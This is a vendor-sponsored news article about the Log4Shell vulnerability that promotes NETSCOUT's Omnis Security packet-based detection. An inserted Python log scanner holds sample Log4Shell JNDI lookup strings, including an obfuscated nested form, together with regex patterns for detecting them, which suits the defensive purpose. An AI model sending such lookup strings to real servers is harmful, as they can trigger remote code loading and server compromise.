On 09 December 2021, the world was alerted to the Log4j vulnerability [CVE-2021-44228 aka Log4Shell]. It is likely that threat actors already knew about the vulnerability before this date, says Tom Bienkowski, NETSCOUT Product Marketing Director, because it’s been reported that the vulnerability had been exposed much earlier in Minecraft chat forums.

How does Log4j work – and what lessons does it bring?

Log4j, which is open-source software provided by the Apache Software Foundation, records errors and routine system operations and sends diagnostic messages about them to system administrators and users. A common example of Log4j in action is when a user types in or clicks on a bad weblink and receives a 404 error message. The web server running the domain of the attempted weblink sends a message to say that the page doesn’t exist, and it also records that event in a log for the server’s system administrators using Log4j. In Minecraft, Log4j is used by the server to log activity such as total memory used and user commands typed into the console.

Log4Shell works by abusing a feature in Log4j that allows users to specify custom code for formatting a log message. Unfortunately, that same feature allows third-party servers to submit software code that can perform all kinds of actions on the targeted computer. This opens the door for threat actors to steal sensitive information and to send malicious content to other users communicating with the affected server.
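As an added defender-side illustration (not code from the article or from NETSCOUT): the feature the text refers to is Log4j 2's string lookup, in which `${jndi:...}` in logged text triggers a remote lookup, and nested lookups such as `${lower:j}` are resolved before the outer one. The scanner below normalizes those nested forms in constructed web-server log lines before matching, so that a check for the literal `${jndi:` is not defeated; the log lines, addresses and host names are constructed for the example.

```python
import re

# Constructed sample log lines (not taken from the article). Line 0 is the
# routine 404 the article describes; lines 1 and 2 carry Log4j lookup strings
# in a request field; line 3 carries a lookup that is not a JNDI one.
SAMPLE_LOG_LINES = [
    '10.0.0.7 - - [10/Dec/2021:08:01:02 +0000] "GET /missing-page HTTP/1.1" 404 "Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:08:01:05 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://host.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:01:09 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:rmi}://host.example/b}"',
    '10.0.0.10 - - [10/Dec/2021:08:01:12 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.79"',
]

# Innermost ${name:arg} lookup (its arg contains no further lookup).
INNER_LOOKUP = re.compile(r"\$\{(?P<name>[a-zA-Z]+):(?P<arg>[^${}]*)\}")
# Log4j default-value syntax ${key:-default}, which resolves to its default.
DEFAULT_FORM = re.compile(r"\$\{[^${}]*:-(?P<default>[^${}]*)\}")
# The JNDI lookup itself together with its URI scheme (ldap, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?P<scheme>[a-zA-Z]+):", re.IGNORECASE)
CASE_TRANSFORMS = {"lower": str.lower, "upper": str.upper}

def _resolve_inner(match):
    """Apply ${lower:x} / ${upper:x}; leave every other lookup untouched."""
    transform = CASE_TRANSFORMS.get(match.group("name").lower())
    return transform(match.group("arg")) if transform else match.group(0)

def normalize(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lookups inside-out, the order Log4j itself uses, so that
    ${${lower:j}ndi:...} becomes ${jndi:...} before we match on it."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_inner, text)
        resolved = DEFAULT_FORM.sub(lambda m: m.group("default"), resolved)
        if resolved == text:
            break
        text = resolved
    return text

def find_jndi_lookups(line: str) -> list:
    """Return the lower-cased URI scheme of every JNDI lookup in the line."""
    return [m.group("scheme").lower() for m in JNDI_LOOKUP.finditer(normalize(line))]

def scan_lines(lines) -> list:
    """(index, schemes) for each line that carries at least one JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((index, schemes))
    return hits
```

The normalization is a defender's approximation of Log4j's own substitution, so a line with no match is not proof that no lookup was attempted; treat the scanner as a triage aid alongside the scanning and patching the article recommends.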

“This vulnerability alerts us to the fact that it is time to start paying attention to packet-based investigations of exploitation,” says Risna Steenkamp, Vendor Alliance Manager for NETSCOUT and Infoblox at Exclusive Networks Africa. “The issue with the Log4j vulnerability was that it could be exploited to download and execute common crypto-mining malware, web shells, Cobalt Strike beacons – and undoubtedly ransomware.”

Bienkowski notes: “Scanning and patching your vulnerable servers (if you can find them all) is absolutely the best defence against this exploit. But that takes time – a lot of time. Therefore, it should be assumed that before or during this time, bad actors have already compromised one or more of your vulnerable servers.”

He therefore advocates packet-based threat detection and investigation as one of the possible tools to detect and remediate exploitation of such a vulnerability – an area where NETSCOUT undoubtedly excels.

The visibility challenge

Steenkamp continues: “In today’s complex networking world – which encompasses legacy networks, branch offices, work-from-home situations and public and private clouds – gaining the proper level of network visibility is more challenging than ever. The threat surface is expanding, and the number of security tools has increased, giving rise to siloed data. Putting this all together, it means that a lack of comprehensive and consistent network visibility makes it harder for cybersecurity teams to conduct expedient and effective threat detection and response.

“In addition, when new technologies are implemented rapidly to meet business needs, this often means that security is compromised. This approach can limit visibility and cause security blind spots, which are attractive to threat agents. How do you protect yourself from threats that you can’t see?”

NETSCOUT digs deep into the visibility challenge

NETSCOUT’s solution to this challenge is Omnis™ Security, a platform for advanced threat analytics and response, which provides comprehensive and consistent network visibility for effective cybersecurity.

NETSCOUT’s patented Smart Data technology provides unequalled visibility by uniquely converting network packets into an intelligent source of data. NETSCOUT has now incorporated that same technology into a cybersecurity solution that offers comprehensive network visibility and more efficient cyber threat detection and response.

About Omnis Security from NETSCOUT

Unlike security information and event management solutions (SIEMs), endpoint detection and response (EDR), or user behaviour analytics (UBA) security technologies, Omnis Security transforms packet data into real-time threat awareness indicators. It empowers your team with relevant contextual data, allowing for swift, decisive action, smarter investigation, and faster, more accurate remediation, as follows:

  • You can identify the deep attack context and quickly assess the extent of the breach to isolate the risk.
  • You are able to remediate more quickly and accurately than using only non-network traffic data sources.
  • Vital forensic reports are created for law enforcement and to support reporting obligations under legislation.

“In the event of a malware attack,” says Steenkamp, “NETSCOUT Omnis Security offers deep visibility into network traffic, including packet-level visibility that can also automatically create a robust set of metadata that gives you visibility into all seven layers of the OSI model, and for many different protocols.

“Omnis further provides the ability to continuously capture and store this robust set of packet-based metadata for real-time and retrospective analysis. Additionally, Omnis infuses this packet-based data with multiple sources of threat intelligence, to automatically detect and conduct analysis of this data, as well as the ability to conduct high-performing decryption.

“While it is true that you can’t protect yourself against a danger that you cannot see, it is also true that in the networking security environment, NETSCOUT is uniquely qualified to be your eyes,” she concludes.

NETSCOUT is distributed throughout Sub-Saharan Africa by Exclusive Networks Africa.

By Staff Writer.
